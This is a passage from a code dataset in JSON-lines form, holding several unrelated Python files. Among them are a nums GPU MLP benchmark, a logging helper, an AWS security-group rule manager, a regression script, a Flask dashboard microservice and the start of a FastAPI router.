CupyOsActorSystem,\n CupyNcclActorSystem,\n CupyParallelSystem,\n)\nfrom nums.models.glms import LogisticRegression\nfrom nums.core import application_manager as am\nfrom utils import benchmark_func, get_number_of_gpus\nimport lr_opt as opt\n\nrandom_seed = 1337\n\n\ndef cupy_used_bytes():\n import cupy as cp\n\n mempool = cp.get_default_memory_pool()\n return mempool.used_bytes()\n\n\n# global app\n\ndef forward(app, X, W):\n Z = opt.collapse_graph_array(app, X @ W)\n return Z\n\n\ndef relu(app, X):\n return X * (X > app.zero)\n\n\ndef relu_deriv(app, X):\n return (X > app.zero) * app.one\n\n\ndef sigmoid(app, one, X):\n return one / (one + app.exp(-X))\n\n\ndef sigmoid_deriv(one, Z):\n return Z * (one - Z)\n\n\ndef one_step_fit_common(app, one, X, y, W_in_1, W_1_2, W_2_out):\n LR = one\n Z_1 = X @ W_in_1\n S_1 = sigmoid(app, one, Z_1)\n F_1 = sigmoid_deriv(one, Z_1).T\n\n Z_2 = S_1 @ W_1_2\n S_2 = sigmoid(app, one, Z_2)\n F_2 = sigmoid_deriv(one, Z_2).T\n\n Z_out = S_2 @ W_2_out\n F_out = sigmoid_deriv(one, Z_out).T\n y_predict = sigmoid(app, one, Z_out)\n\n # --back propagation--\n D_out = F_out * (y_predict - y).T\n D_2 = F_2 * (W_2_out @ D_out)\n D_1 = F_1 * (W_1_2 @ D_2)\n\n W_in_1 = W_in_1 - LR * (D_1 @ X).T\n W_1_2 = W_1_2 - LR * (D_2 @ S_1).T\n W_2_out = W_2_out - LR * (D_out @ S_2).T\n\n return W_in_1, W_1_2, W_2_out\n\n\ndef one_step_fit_np(np, X, y, W_in_1, W_1_2, W_2_out):\n rets = one_step_fit_common(np, 1, X, y, W_in_1, W_1_2, W_2_out)\n endtime = time.time()\n return endtime\n\n\ndef 
one_step_fit(app, X, y, W_in_1, W_1_2, W_2_out):\n rets = one_step_fit_common(app, app.one, X, y, W_in_1, W_1_2, W_2_out)\n endtime = time.time()\n\n for x in rets:\n x.touch()\n return endtime\n\n\ndef distribute_weights(W, cluster_state):\n for node_id in cluster_state.get_cluster_node_ids():\n for grid_entry in W.grid.get_entry_iterator():\n from nums.core.array.base import Block\n block: Block = W.blocks[grid_entry]\n if node_id not in cluster_state.get_block_node_ids(block.id):\n dst_actor = node_id[0]\n app.system.distribute_to(block.oid, dst_actor) # copy for compute\n cluster_state.commit_copy_block(block.id, node_id) # copy for optimizer\n\n\ndef one_step_fit_opt(app, X, y, W_in_1, W_1_2, W_2_out, num_gpus, verbose=False):\n # --forward propagation--\n if verbose:\n print(\"start forward propagation\")\n LR = app.one\n cluster_state = ClusterState((num_gpus, 1), app.system)\n one_ga: GraphArray = GraphArray.from_ba(app.one, cluster_state)\n X_ga = GraphArray.from_ba(X, cluster_state)\n y_ga = GraphArray.from_ba(y, cluster_state)\n W_in_1_ga = GraphArray.from_ba(W_in_1, cluster_state)\n W_1_2_ga = GraphArray.from_ba(W_1_2, cluster_state)\n W_2_out_ga = GraphArray.from_ba(W_2_out, cluster_state)\n\n if verbose:\n print(f\"distribute weights\")\n # Distribute Weights\n distribute_weights(W_in_1, cluster_state)\n distribute_weights(W_1_2, cluster_state)\n distribute_weights(W_2_out, cluster_state)\n\n Z_1_ga: GraphArray = forward(app, X_ga, W_in_1_ga)\n S_1_ga: GraphArray = opt.sigmoid(app, Z_1_ga, one_ga)\n F_1_ga: GraphArray = opt.sigmoid_deriv(app, Z_1_ga, one_ga)\n\n if verbose:\n print(\"forward Z_2\")\n Z_2_ga: GraphArray = forward(app, S_1_ga, W_1_2_ga)\n S_2_ga: GraphArray = opt.sigmoid(app, Z_2_ga, one_ga)\n F_2_ga: GraphArray = opt.sigmoid_deriv(app, Z_2_ga, one_ga)\n if verbose:\n print(\"forward Z_out\")\n Z_out_ga: GraphArray = forward(app, S_2_ga, W_2_out_ga)\n y_predict_ga: GraphArray = opt.sigmoid(app, Z_out_ga, one_ga)\n F_out_ga: GraphArray = opt.sigmoid_deriv(app, Z_out_ga, one_ga)\n\n initend = time.time()\n # --back propagation--\n D_out_ga = opt.collapse_graph_array(app, F_out_ga.T * (y_predict_ga - y_ga).T)\n if verbose:\n print(\"collapse D_2_ga\")\n D_2_ga = opt.collapse_graph_array(app, F_2_ga.T * (W_2_out_ga @ D_out_ga))\n if verbose:\n print(\"collapse D_1_ga\")\n D_1_ga = opt.collapse_graph_array(app, F_1_ga.T * (W_1_2_ga @ D_2_ga))\n\n endtime = time.time()\n if verbose:\n print(\"collapse_graph_array dW_in_1_ga\")\n \n dW_in_1_ga = opt.collapse_graph_array(app, (D_1_ga @ X_ga).T)\n if verbose:\n print(\"collapse_graph_array dW_1_2_ga\")\n dW_1_2_ga = opt.collapse_graph_array(app, (D_2_ga @ S_1_ga).T)\n if verbose:\n print(\"collapse_graph_array dW_2_out_ga\")\n dW_2_out_ga = opt.collapse_graph_array(app, (D_out_ga @ S_2_ga).T)\n\n dW_in_1_ga_ba: BlockArray = opt.compute_graph_array(app, dW_in_1_ga)\n dW_1_2_ga_ba: BlockArray = opt.compute_graph_array(app, dW_1_2_ga)\n dW_2_out_ga_ba: BlockArray = opt.compute_graph_array(app, dW_2_out_ga)\n\n W_in_1 = W_in_1 - LR * dW_in_1_ga_ba\n W_1_2 = W_1_2 - LR * dW_1_2_ga_ba\n W_2_out = W_2_out - LR * dW_2_out_ga_ba\n\n W_in_1.touch()\n W_1_2.touch()\n W_2_out.touch()\n\n return initend, endtime\n\n\ndef np_init_weights(app, X, y, dtype):\n dim_1 = 4096 # neurons in the first layer\n dim_2 = 4096 # neurons in the second layer\n\n W_in_1 = app.random.normal(size=(X.shape[1], dim_1)).astype(dtype)\n W_1_2 = app.random.normal(size=(dim_1, dim_2)).astype(dtype)\n W_2_out = app.random.normal(size=(dim_2, 
y.shape[1])).astype(dtype)\n return W_in_1, W_1_2, W_2_out\n\n\ndef data_init_weights(app: ArrayApplication, X, y, verbose=False):\n dim_1 = 4096 # neurons in the first layer\n dim_2 = 4096 # neurons in the second layer\n\n W_in_1 = app.random.normal(shape=(X.shape[1], dim_1), block_shape=(X.block_shape[1], dim_1), dtype=X.dtype)\n W_1_2 = app.random.normal(shape=(dim_1, dim_2), block_shape=(dim_1, dim_2), dtype=X.dtype)\n W_2_out = app.random.normal(shape=(dim_2, y.shape[1]), block_shape=(dim_2, y.block_shape[1]),\n dtype=X.dtype)\n if verbose:\n print(f\"W_in_1.shape {W_in_1.shape} W_in_1.block_shape {W_in_1.block_shape}\")\n print(f\"W_1_2.shape {W_1_2.shape} W_1_2.block_shape {W_1_2.block_shape}\")\n print(f\"W_2_out.shape {W_2_out.shape} W_2_out.block_shape {W_2_out.block_shape}\")\n return W_in_1, W_1_2, W_2_out\n\n\ndef np_sample(app, sample_size, feature, dtype):\n X_train = app.random.normal(size=(sample_size, feature)).astype(dtype)\n y_train = app.ones((sample_size, 1), dtype=dtype)\n return X_train, y_train\n\n\ndef sample(app: ArrayApplication, sample_size, feature, num_gpus, dtype):\n X_train = app.random.normal(shape=(sample_size, feature), block_shape=(sample_size // num_gpus, feature),\n dtype=dtype)\n y_train = app.ones(shape=(sample_size, 1), block_shape=(sample_size // num_gpus, 1), dtype=dtype)\n return X_train, y_train\n\n\ndef benchmark_mlp(num_gpus, N_list, system_class_list, d=1000, optimizer=True, dtype=np.float32):\n format_string = \"%20s,%10s,%10s,%10s,%10s,%10s\"\n print(format_string % (\"Library\", \"N\", \"Cost\", \"CostOpt\", \"CostInit\", \"CV\"))\n global app\n\n for N in N_list:\n N = int(N)\n\n for system_class in system_class_list:\n # try:\n if True:\n if system_class in [\"Cupy\", \"Numpy\"]:\n name = system_class\n import cupy as cp\n\n arr_lib = cp if system_class == \"Cupy\" else np\n app = arr_lib\n\n X, y = np_sample(np, sample_size=N, feature=d, dtype=dtype)\n W_in_1, W_1_2, W_2_out = np_init_weights(np, X, y, dtype=dtype)\n\n X = cp.asarray(X)\n y = cp.asarray(y)\n W_in_1 = cp.asarray(W_in_1)\n W_1_2 = cp.asarray(W_1_2)\n W_2_out = cp.asarray(W_2_out)\n\n cp.cuda.Device(0).synchronize()\n\n # Benchmark one step mlp\n def func():\n tic = time.time()\n toc_end = one_step_fit_np(arr_lib, X, y, W_in_1, W_1_2, W_2_out)\n cp.cuda.Device(0).synchronize()\n toc = time.time()\n return toc - tic, toc_end - tic, 0, None\n\n costs, costs_opt, costs_init = benchmark_func(func)\n del (X, y, W_in_1, W_1_2, W_2_out)\n else:\n # Init system\n name = system_class.__name__\n app = am.instance(num_gpus, optimizer)\n\n # Make dataset\n nps.random.seed(0)\n X, y = sample(app, sample_size=N, feature=d, num_gpus=num_gpus, dtype=dtype)\n W_in_1, W_1_2, W_2_out = data_init_weights(app, X, y, verbose=False)\n\n # Benchmark one step MLP\n def func():\n tic = time.time()\n if optimizer:\n toc_init, toc_opt = one_step_fit_opt(app, X, y, W_in_1, W_1_2, W_2_out, num_gpus, verbose=False)\n else:\n toc_init = tic\n toc_opt = one_step_fit(app, X, y, W_in_1, W_1_2, W_2_out)\n\n toc = time.time()\n return toc - tic, toc_opt - tic, toc_init - tic, None\n\n costs, costs_opt, costs_init = benchmark_func(func)\n\n del (X, y, W_in_1, W_1_2, W_2_out)\n am.destroy()\n # except Exception:\n else:\n costs = [-1]\n costs_opt = [-1]\n costs_init = [-1]\n\n log_str = format_string % (\n name,\n \"%d\" % N,\n \"%.4f\" % np.mean(costs),\n \"%.4f\" % np.mean(costs_opt),\n \"%.4f\" % np.mean(costs_init),\n \"%.2f\" % (np.std(costs) / np.mean(costs)),\n )\n\n print(log_str)\n with 
open(\"result_mlp_data.csv\", \"a\") as f:\n f.write(log_str + \"\\n\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--num-gpus\", type=int)\n parser.add_argument('--optimizer',\n help='This is a boolean flag.',\n type=eval,\n choices=[True, False],\n default='True')\n\n args = parser.parse_args()\n num_gpus = args.num_gpus or get_number_of_gpus()\n optimizer = args.optimizer\n\n ray.init(address='auto', _redis_password='5241590000000000')\n\n benchmark_mlp(\n num_gpus,\n N_list=[\n # 2000,\n # 4000,\n # 8000,\n 16000,\n 32000,\n 40000,\n 42000,\n 44000,\n # 0.5e6 / 4,\n # 1e6 / 4,\n # 2e6 / 4,\n # 3e6 / 4,\n # 5e6 / 4,\n # 10e6 / 4,\n # 20e6 / 4,\n # 40e6 / 4,\n # 80e6 / 4,\n # 160e6 / 4,\n # 200e6 / 4,\n ],\n system_class_list=[\n # NumpySerialSystem,\n # CupySerialSystem,\n # NumpyRaySystem,\n # CupyRaySystem,\n # TorchGPURaySystem,\n # CupyOsActorSystem,\n CupyNcclActorSystem,\n # CupyParallelSystem,\n # \"Cupy\",\n # \"Numpy\",\n ],\n optimizer=optimizer,\n )\n\n ray.shutdown()\n","repo_name":"liuhanyao98/nums_gpu_draft","sub_path":"nums/experimental/benchmark_mlp_data.py","file_name":"benchmark_mlp_data.py","file_ext":"py","file_size_in_byte":12025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"20520220729","text":"\"\"\"Log utils\"\"\"\nimport sys\nimport logging\nfrom datetime import datetime\nfrom typing import Union, Optional\nfrom pathlib import Path\n\nLOG_FORMAT = \"%(asctime)-15s %(levelname)-5s %(name)-15s - %(message)s\"\n\n\ndef setup_logger(log_path: Union[str, Path],\n log_level: logging,\n fmt: Optional[str] = LOG_FORMAT):\n \"\"\"Setup for a logger instance.\n Args:\n log_path: full path\n log_level:\n fmt: message format\n \"\"\"\n logger = logging.getLogger()\n fmt = logging.Formatter(fmt=fmt)\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(fmt)\n logger.addHandler(stream_handler)\n\n logger.setLevel(log_level)\n logger.handlers = []\n stdout_handler = logging.StreamHandler(sys.stdout)\n stdout_handler.setFormatter(fmt)\n logger.addHandler(stdout_handler)\n\n log_path = Path(log_path)\n directory = log_path.parent\n directory.mkdir(exist_ok=True)\n file_handler = logging.FileHandler(str(log_path))\n file_handler.setFormatter(fmt)\n logger.addHandler(file_handler)\n logger.info(\"Log at {}\".format(log_path))\n\n\ndef log_name(name: str) -> str:\n \"\"\"Generate log name\"\"\"\n timestamp = datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n return \"{}_{}.log\".format(name, timestamp)\n","repo_name":"jackonelli/werner_prob","sub_path":"src/utils/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14868595291","text":"import time\nfrom datetime import datetime, timedelta\n\nfrom dateutil import parser\n\nimport args\nimport helper\nimport json\n\n\nclass SecGroup:\n\n def __init__(self, **kwargs):\n self.rules = [SecGroupRule(rule) for rule in kwargs.get('rules', [])]\n self.aws_client = kwargs.get('aws_client', None)\n self.aws_group_dict = kwargs.get('aws_group_dict', {})\n\n self.__aws_rule = None\n\n @property\n def aws_group_id(self):\n return self.aws_group_dict.get('GroupId')\n\n @property\n def aws_ingress_rules(self):\n if not self.__aws_rule:\n ip_permissions = self.aws_group_dict.get('IpPermissions', [])\n self.__aws_rule = list(\n map(lambda fr: SecGroupRule(\n type='ingress', # TODO support type 
'egress' also\n from_port=int(fr['FromPort']),\n to_port=int(fr['ToPort']),\n protocol=fr['IpProtocol'],\n ip_ranges=fr['IpRanges'],\n origin=fr\n ), ip_permissions)\n )\n return self.__aws_rule\n\n @property\n def ingress_rules(self):\n return list(filter(lambda r: r.is_ingress(), self.rules))\n\n def __prepare_aws_args(self, **kwargs):\n expire = kwargs.get('expire', None)\n\n ip_ranges = kwargs.get('ip_ranges', [])\n if args.arguments.cidr_ip is not None:\n ip_ranges.append(\n {'CidrIp': args.arguments.cidr_ip} if expire is None\n else {\n 'CidrIp': args.arguments.cidr_ip,\n 'Description': args.Arguments.EXPIRED_AT % f'{expire.isoformat()}{time.strftime(\"%z\")}'\n }\n )\n\n rules = kwargs.get('rules', self.rules)\n ip_permissions = [{\n 'IpRanges': ip_ranges if ip_ranges else rule.ip_ranges,\n 'FromPort': int(rule.from_port),\n 'ToPort': int(rule.to_port),\n 'IpProtocol': rule.protocol\n } for rule in rules]\n\n aws_args = {'GroupId': self.aws_group_id, 'IpPermissions': ip_permissions} if ip_permissions else None\n args.arguments.logger.debug(f\"Arguments send to aws: {aws_args}\")\n return aws_args\n\n def authorize(self):\n now = datetime.now()\n expire = now + timedelta(days=0, seconds=args.arguments.time_to_expire)\n\n rules = self.ingress_rules\n for rule1 in self.ingress_rules:\n for rule2 in self.aws_ingress_rules:\n if not rule1.merge(rule2):\n rules.append(rule2)\n args.arguments.logger.debug(f\"authorize_rules: {rules}\")\n\n self.__retry(\n fn_retries=[\n lambda _, aws_args: self.aws_client.authorize_security_group_ingress(**aws_args),\n lambda _, aws_args: self.aws_client.update_security_group_rule_descriptions_ingress(**aws_args)\n ],\n expire=expire,\n rules=set(rules)\n )\n args.arguments.logger.info(f\"Group {self.aws_group_id} authorized, error: {self.error_rules}\")\n\n def __retry(self, **kwargs):\n fn_retries = kwargs.get('fn_retries')\n error, ips = None, self.__prepare_aws_args(**kwargs)\n\n args.arguments.logger.debug(f\"Do action for group {self.aws_group_id} all rules in once call\")\n\n for fn_retry in fn_retries:\n error = helper.get_catch(\n fn=lambda: fn_retry(error, ips),\n ignore_error=False,\n ignore_result=True\n ) if ips else None\n if not error: break\n\n if not error:\n args.arguments.logger.info(f\"Group {self.aws_group_id} is done\")\n return\n\n args.arguments.logger.debug(\n f\"Error: {str(error)} => try do action for group {self.aws_group_id} one by one rule\")\n\n # we have an error then retry one-by-one\n rules, retry_once = kwargs.get('rules', []), kwargs.get('retry_once', True)\n if len(rules) == 1:\n rules[0].error = str(error)\n elif retry_once:\n for rule in rules:\n kwargs['retry_once'], kwargs['rules'] = False, [rule]\n self.__retry(**kwargs)\n args.arguments.logger.info(f\"Group {self.aws_group_id} is done\")\n else:\n for rule in rules: rule.error = str(error)\n\n @property\n def error_rules(self):\n return list(filter(lambda r: r.error, self.rules))\n\n def revoke(self):\n self.__revoke(revoke_rules=self.ingress_rules)\n args.arguments.logger.info(f\"Group {self.aws_group_id} revoked, error: {self.error_rules}\")\n\n def __revoke(self, revoke_rules):\n args.arguments.logger.debug(f\"revoke_rules: {revoke_rules}\")\n self.__retry(\n fn_retries=[lambda _, ips: self.aws_client.revoke_security_group_ingress(**ips)],\n rules=revoke_rules if revoke_rules else self.ingress_rules\n )\n\n def clear(self):\n now = datetime.now()\n revoke_rules = []\n for rule1 in self.aws_ingress_rules:\n args.arguments.logger.debug(f\"rule1: {rule1}\")\n for 
rule2 in self.ingress_rules:\n if not rule1.has_same_ports(rule2):\n continue\n rule1.ip_ranges = rule1.expired_ips(now)\n if rule1.ip_ranges:\n revoke_rules.append(rule1)\n\n args.arguments.logger.debug(f\"revoke_rules: {revoke_rules}\")\n if revoke_rules:\n self.__revoke(revoke_rules=revoke_rules)\n args.arguments.logger.info(f\"Group {self.aws_group_id} {'cleared' if revoke_rules else 'has no rule to clear'}, error: {self.error_rules}\")\n\n\nclass SecGroupRule():\n\n def __init__(self, iterable=(), **kwargs):\n self.type = None\n self.protocol = None\n self.to_port = None\n self.from_port = None\n self.ip_ranges = []\n\n self.__dict__.update(iterable, **kwargs)\n self.error = None\n\n def __eq__(self, other):\n if isinstance(self, other.__class__):\n return str(self) == str(other)\n return False\n\n def __hash__(self) -> int:\n return str(self).__hash__()\n\n def __str__(self) -> str:\n return json.dumps({\n \"from_port\": self.from_port,\n \"to_port\": self.to_port,\n \"protocol\": self.protocol,\n \"type\": self.type,\n \"ip_ranges\": [{\n \"CidrIp\": ipr[\"CidrIp\"],\n \"Description\": ipr[\"Description\"]\n } for ipr in self.ip_ranges]\n })\n\n def has_same_ports(self, other):\n for p in ['type', 'from_port', 'to_port', 'protocol']:\n if str(getattr(self, p, \"v2\")) != str(getattr(other, p, \"v1\")):\n return False\n return True\n\n def merge(self, other):\n if self.has_same_ports(other):\n return False\n\n other_iprs = []\n for ipr1 in self.ip_ranges:\n for ipr2 in other.ip_ranges:\n if ipr1[\"CidrIp\"] == ipr2[\"CidrIp\"]:\n ipr1[\"Description\"] = ipr2[\"Description\"]\n else:\n other_iprs.append(ipr2)\n self.ip_ranges += other_iprs\n return True\n\n def expired_ips(self, now):\n expired_ips = []\n expired_term = args.Arguments.EXPIRED_AT % \"\"\n for ipr in self.ip_ranges:\n desc = ipr.get('Description', '')\n if not desc: continue\n try:\n expired_time = parser.parse(desc[desc.startswith(expired_term) and len(expired_term):])\n if now.timestamp() >= expired_time.timestamp():\n expired_ips.append(ipr)\n except ValueError as e:\n args.arguments.logger.debug(f\"Ignore error {e}\")\n args.arguments.logger.debug(f\"Rule: {self} has expired_ips: {expired_ips}\")\n return expired_ips\n\n def is_ingress(self):\n return getattr(self, 'type') == 'ingress'\n\n def is_egress(self):\n return getattr(self, 'type') == 'egress'\n","repo_name":"riboseinc/terraform-aws-authenticating-secgroup","sub_path":"modules/python/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8028,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"73918696266","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.datasets import make_regression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom Librairie_version16062020 import*\nimport argparse\nimport functools\nimport random\nimport scipy.stats\nfrom sklearn.linear_model import LinearRegression\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fich', metavar='L', type=str, nargs='+',\n help='le dataset') \nparser.add_argument('--na', metavar='N', type=str, nargs='+',\n help='gestion na')\nparser.add_argument('--target', metavar='T', type=str, nargs='+',\n help='target attribut')\nparser.add_argument('--sep', metavar='L', type=str, nargs='+',\n help='le séparateur')\nparser.add_argument('--att', nargs='+', type=str)\n\n \nargs = parser.parse_args()\n\nfich=tuple(args.fich)[0]\n\nse=tuple(args.sep)[0]\n\nif 
(se==\"space\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep ='\\s+')\nelif (se==\"tab\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep ='\\t')\nelif (se==\"comma\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep =',')\nelif (se==\"semicolon\"):\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep =';')\nelse:\n\tdata = pd.read_csv('/home/ali/stage/public/regression_multiple/datasets/'+fich,sep =':')\n\nval = []\n\nfor att in tuple(args.att):\n\tval.append(att[:-1])\n\nprint(val)\n\nfichier3 = open(\"xindex.txt\",\"w\")\nfichier = open(\"tmp_reg2.txt\",\"r\")\nnumb_att = fichier.readline()\ngestion_na = fichier.readline()\nfichier3.write(str(len(val))+\"\\n\") \n\ncol = []\nfor i in range (int(numb_att)):\n\ta=fichier.readline()\n\ta=a[:-1]\n\tcol.append(a)\t\n\n\n# Choix des attributs pertinants\ndata = data[col]\n\n\n# Gestion des valeurs manquantes\nif(gestion_na[:-1]==\"remplacer\"):\n for col in data.columns: \n data[col]=data[col].fillna(value=data[col].mean())\nelse:\n data = data.dropna(axis=0)\n\n\ny = data[tuple(args.target)[0][:-1]]\n\nX = data.drop([tuple(args.target)[0][:-1]],axis=1)\n\n# Indices des attributs pour les figures\nind = []\nfor i in range (len(X.columns)):\n\tif (X.columns[i] in val):\n\t\tind.append(i)\n\t\tfichier3.write(str(i)+\"\\n\") \n\nprint(ind)\n\ny = np.array(y)\ny=y.reshape(y.shape[0], 1)\n\nx=np.array(X).reshape(y.shape[0],int(numb_att)-1)\n\nM = np.hstack((np.ones(y.shape),x))\n\ntheta = np.random.randn(int(numb_att), 1)\n\ndef model(X, theta):\n return X.dot(theta)\n\n\nt1= np.transpose(M).dot(M)\nt2= np.transpose(y).dot(M)\nt3= np.linalg.inv(t1)\ntheta_final=t3.dot(np.transpose(t2))\n\n# création d'un vecteur prédictions qui contient les prédictions de notre modele final\npredictions = model(M, theta_final)\n\n\nexpr='Y='+str(round(theta_final[0][0],2));\n\nfor j in range (len(X.columns)):\n\texpr=expr+'+'+str(round(theta_final[len(X.columns)-1-j][0],4))+'X_{'+X.columns[j]+'}'\n\ndef droite(x):\n return theta_final[0]+theta_final[1]*x\n\n# Affiche les résultats de prédictions (en rouge) par rapport a notre Dataset (en bleu)\nfor j in range(len(val)):\n\tfig=plt.figure()\n\tplt.scatter(x[:,ind[j]],y)\n\tplt.scatter(x[:,ind[j]], predictions, c='r')\n\tplt.ylabel(tuple(args.target)[0][:-1])\n\tplt.xlabel(val[j][:-1])\n\tfig.suptitle(expr)\n\tfig.savefig(\"modele\"+str(j)+\".png\")\n\tplt.close()\n\nmodel2 = LinearRegression()\nmodel2.fit(x,y)\nmodel2.score(x,y)\npredictions = model2.predict(x)\n\n","repo_name":"AliElMahouli/Stage1A","sub_path":"public/regression_multiple/regression3.py","file_name":"regression3.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25131972774","text":"import logging.config\nimport os\nimport sys\n\nimport requests\nfrom autologging import traced, logged\nfrom flask import Flask, request\nfrom flask import jsonify, make_response\nfrom flask import url_for\nfrom flask_consulate import Consul as Consulate\nfrom flask_jwt_extended import JWTManager, jwt_required\nfrom flask_prometheus_metrics import register_metrics\nfrom flask_restx import Api\nfrom flask_restx import fields, Resource\nfrom flask_zipkin import Zipkin\nfrom prometheus_client import make_wsgi_app\nfrom werkzeug.middleware.dispatcher import DispatcherMiddleware\nfrom werkzeug.serving import 
run_simple\n\napp = Flask(__name__)\napp.config.from_envvar('ENV_FILE_LOCATION')\napp.debug = app.config['DEBUG']\n\nfor v in os.environ:\n env = os.getenv(v)\n if v == 'SERVER_PORT':\n env = int(env)\n app.config[v] = env\n\njwt = JWTManager(app)\n\nlog = logging.getLogger(__name__)\n\nlogging.basicConfig(\n format=\"%(levelname)s [%(name)s %(funcName)s] %(message)s\",\n level=app.config['LOG_LEVEL'],\n stream=sys.stdout\n)\n\n\nclass CustomApi(Api):\n @property\n def specs_url(self):\n \"\"\"\n The Swagger specifications absolute url (ie. `swagger.json`)\n\n :rtype: str\n \"\"\"\n return url_for(self.endpoint('specs'), _external=False)\n\n\nauthorizations = {\n 'apikey': {\n 'type': 'apiKey',\n 'in': 'header',\n 'name': 'Authorization'\n }\n}\n\n\ndef initialize_api(app):\n return CustomApi(app=app, catch_all_404s=True, version='1.0', title='API - Products Service',\n description='Products Management', doc='/swagger-ui.html',\n default_label='products endpoints', default='products',\n authorizations=authorizations, security='apikey')\n\n\napi = initialize_api(app)\n\nns = api.namespace('api/dashboard', description='Dashboard operations')\n\ncategoryModel = api.model('DashboardTotalByCategory', {\n 'category': fields.String(required=True, description='Category Name'),\n 'total': fields.Integer(required=True, description='Total')\n})\n\ntodoModel = api.model('Todo', {\n 'name': fields.String(required=True, description='Name'),\n 'createdDate': fields.DateTime(required=True, description='Created Date'),\n 'plannedEndDate': fields.DateTime(required=True, description='Planned Date'),\n 'done': fields.Boolean(required=True, description='Done?')\n})\n\n\n@traced(log)\n@logged(log)\n@ns.route('/totalCategory')\nclass DashboardCategoryApi(Resource):\n \"\"\"Return list of categories\"\"\"\n\n @jwt_required\n @ns.doc(description='List of categories',\n params={'categoryName': 'Category Name', 'personId': 'Person Id', 'plannedEndDate': 'Planned Date',\n 'done': 'Todo done?'},\n responses={\n 400: 'Validation Error',\n 401: 'Unauthorized',\n 403: 'Forbidden',\n 500: 'Unexpected Error'\n })\n @api.response(200, 'Success', [categoryModel])\n def get(self):\n token = request.headers.get('Authorization')\n category_name = request.args.get('categoryName')\n person_id = request.args.get('personId')\n planned_end_date = request.args.get('plannedEndDate')\n done = request.args.get('done')\n log.debug('Token: %s', token)\n url = app.config['TODO_URL']\n query_param = '?'\n if category_name is not None:\n query_param += '&categoryName=' + category_name\n if person_id is not None:\n query_param += '&personId=' + person_id\n if planned_end_date is not None:\n query_param += '&plannedEndDate=' + planned_end_date\n if done is not None:\n query_param += '&done=' + done\n\n if query_param != '?':\n url += query_param\n r = requests.get(url, headers={'Content-Type': 'application/json',\n 'Authorization': token})\n json = r.json()\n if r.status_code == 200:\n array = []\n for key in json:\n array.append({'category': key, 'total': len(json[key])})\n json = jsonify(array)\n\n return make_response(json, r.status_code)\n\n\n@app.errorhandler(Exception)\ndef handle_root_exception(error):\n \"\"\"Return a custom message and 400 or 500 status code\"\"\"\n log.exception(error)\n if hasattr(error, 'errors'):\n return make_response(jsonify(error=str(error.errors)), 400)\n return make_response(jsonify(error=str(error)), 500)\n\n\n@app.route('/actuator/health')\ndef health():\n return jsonify({'status': 'OK'})\n\n\nserver_port = 
app.config['SERVER_PORT']\n\n\n@app.route('/actuator/info')\ndef actuator_info():\n return jsonify({})\n\n\n@app.route('/actuator')\ndef actuator_index():\n port = server_port\n actuator = {\n \"_links\": {\n \"self\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator\",\n \"templated\": False\n },\n \"health\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/health\",\n \"templated\": False\n },\n \"info\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/info\",\n \"templated\": False\n },\n \"prometheus\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/prometheus\",\n \"templated\": False\n },\n \"metrics\": {\n \"href\": \"http://localhost:\" + str(port) + \"/actuator/metrics\",\n \"templated\": False\n }\n }\n }\n return jsonify(actuator)\n\n\nzipkin = Zipkin(sample_rate=int(app.config['ZIPKIN_RATIO']))\nzipkin.init_app(app)\n\napi.add_namespace(ns)\ndebug_flag = app.config['DEBUG']\n\n\ndef initialize_dispatcher(app):\n initialize_consul(app)\n\n # Plug metrics WSGI app to your main app with dispatcher\n return DispatcherMiddleware(app.wsgi_app, {\"/actuator/prometheus\": make_wsgi_app()})\n\n\ndef initialize_consul(app):\n app_name = app.config['APP_NAME']\n # Consul\n # This extension should be the first one if enabled:\n consul = Consulate(app=app)\n # Fetch the conviguration:\n consul.apply_remote_config(namespace='config/'+app_name+'/data')\n # Register Consul service:\n consul.register_service(\n name=app_name,\n interval='10s',\n tags=['webserver', ],\n port=server_port,\n httpcheck='http://localhost:' + str(server_port) + '/actuator/health'\n )\n\n public_key_location = app.config['JWT_PUBLIC_KEY']\n\n log.debug('public_key_location: %s', public_key_location)\n\n app.config['JWT_PUBLIC_KEY'] = open(app.config['JWT_PUBLIC_KEY'], \"r\").read()\n\n log.debug('Config environment: %s', app.config)\n\n # provide app's version and deploy environment/config name to set a gauge metric\n register_metrics(app, app_version=\"v0.1.2\", app_config=\"staging\")\n\n\nif __name__ == \"__main__\":\n run_simple(hostname=\"0.0.0.0\", port=server_port, application=initialize_dispatcher(app), use_debugger=debug_flag)\n","repo_name":"rodrigorodrigues/microservices-with-istio-service-mesh","sub_path":"aggregator-service/flask/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7036,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"37184630757","text":"from fastapi import HTTPException, APIRouter, Depends, Cookie\nfrom pydantic import BaseModel\nfrom typing import List, Any\nimport mysql.connector\n\nfrom api.config import SNACKVIDIA_CONFIG\nfrom api.auth import decode_access_token, verify_token\n\nrouter = APIRouter()\n\n# Model for data in the snack table\nclass Snack(BaseModel):\n nama_snack: Any\n deskripsi: Any\n rating: Any\n asal_daerah: Any\n harga: Any\n 